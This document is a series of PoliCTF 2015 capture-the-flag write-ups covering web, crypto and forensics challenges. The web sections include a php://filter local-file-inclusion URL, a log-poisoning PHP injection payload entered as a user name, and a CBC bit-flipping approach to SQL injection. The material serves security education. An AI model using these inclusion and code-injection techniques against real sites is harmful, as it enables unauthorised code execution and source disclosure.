PoliCTF 2015. Web350 - Magic Chall

We are presented with a web that allows us to register an account, then log in and be surprised with random disturbing videos xDDD. The web uses a page parameter to reference and include other pages and its vulnerable to LFI. For example, instead of going to http://magic.polictf.it/magic_things.php we can include it in index.php with http://magic.polictf.it/index.php?page=magic_things. So it seems that we can include any file ending in .php since we cannot seem to discard the extension using a null byte.
First thing to try in a php application are the php filters. So we can try to read the source code by using the base64 filter:
http://magic.polictf.it/index.php?page=php://filter/convert.base64-encode/resource=index and voila, the site returns us a base64 version of index.php source code: From here we procedeed to collect and read all source code and include files. Interesting things:

1 - Running any method on a Magic instance will print the flag:

2 - Log files are written to $_SERVER["DOCUMENT_ROOT"]."log/" . $host . "_" . $user->getSurname() so we can control the extension by setting our Surename to foo.php. Also controlling the user Name, we can inject any arbitrary strings in the log. This smells like remote code execution.

Now, all we need to do is to register a user with Name: <?php (new Magic())->test();?> and surename: foo.php and then visit the log and read the flag:

PoliCTF 2015. Web150 - John The Referee

We are presented with an online shop to buy Referee t-shirts:

They have ids from 1-8 and then 10 (skipping 9).

There is also a search form that seems to escape some characters:

The search submission is somehow weird. Our search is submitted to server that returns a hash that we submit back to get the actual results. So either way the hash is an encrypted version of our search query that is decrypted and executed in the server or its a hash that represents the query and its mapped to our query in the server sesssion. Since there are no session cookies, it seems the former. So the process is the following, we submit our search query, it goes to the server where it gets escaped and encrypted. We get the encrypted value that we submit again for the server to decrypt and run the query. Since the query was escaped before encryption, there is no reason to not trust the decrypted query, right? someone said integrity? Ok, so all we have to do is submit our SQLi payload and replace the single quote with any arbitrary character. Then bit flip that character and send to server and see if any flipped queries result in a valid query with a single quote:

Now we can take the encrypted query and replay it bitflipping the first character (a) until it or the next one (eg: cbc) becomes a single quote. We get the flag:

PoliCTF 2015. Web100 - John The Traveller

Holidays are here! But John still hasn't decided where to spend them and time is running out: flights are overbooked and prices are rising every second. Fortunately, John just discovered a website where he can book last second flight to all the European capitals; however, there's no time to waste, so he just grabs his suitcase and thanks to his new smartphone he looks the city of his choice up while rushing to the airport. There he goes! Flight is booked so... hauskaa lomaa! We are presented with a web that allows us to search for European capitals. It does seem injectable and theres nothing weird. The website returns a random number of flights with their costs in EURs and nothing else.

After losing a lot of time with this one, we re-read the challange description once again and wondered about hauskaa lomaa. It turns out it means Happy vacations in Finish. So we checked flights to Helsinki and finally something out of the ordinary: the price was in px (pixels?) and there where always 6 results:

After having a look at the source code we realize that it contains a responsive UI and that the result table contains special classes:

After loading the page on a device emulator with any of those widths, we get a QR:

Flag is: flag{run_to_the_hills_run_for_your_life}

PoliCTF 2015. Crypto100 - And the prophet said

We are given a text that looks like base64, so we decode it and find a gzip file that contains a text file with 296 phrases from the bible. These phrases are repited so we assigned a random character to each line and got something like:

abccde fagh iajccbklb gh mbno bjho ghkpf gfq gpr fnogkl fd sngfb j cdkl rbhhjlb hd hfjfghfgih sgcc abct odu sgfa fab cbffbn vnbwubkigbhx yuf gpr kdf nbjcco lddz jf fajfx d0 fajfph bkdulae jajae gpr gk cdmb sgfa hgrtcb cdsbnijhb vcjlh sgfaduf htjibh jkz hfnjklb horydchx vcjl1cyafyllumvhokfyywsyd2  

Using a substitution decipher and a little bit of manual correction we get:

hello, this challenge is very easy isn't it? i'm trying to write a long message so statistics will help you with the letter frequencies. but i'm not really good at that. ok that's enough, ahah, i'm in love with simple lowercase flags without spaces and strange symbols. flag{lbhtbgguvfsyntbbqwbo}  

So flag is:


Which turns out to be anot valid flag. But the challange description said we need an extra step here, so we try to decode it using decoders such as ROT13 and voila:


PoliCTF 2015. Forensics100 - John In The Middle

We are given a pcap with the traffic generated to an old version of http://polictf.it. We can use NetworkMiner or similar tools to extract all files and compare them with the originals. logo.png differs from original and using StegoSolve we can find the secret flag: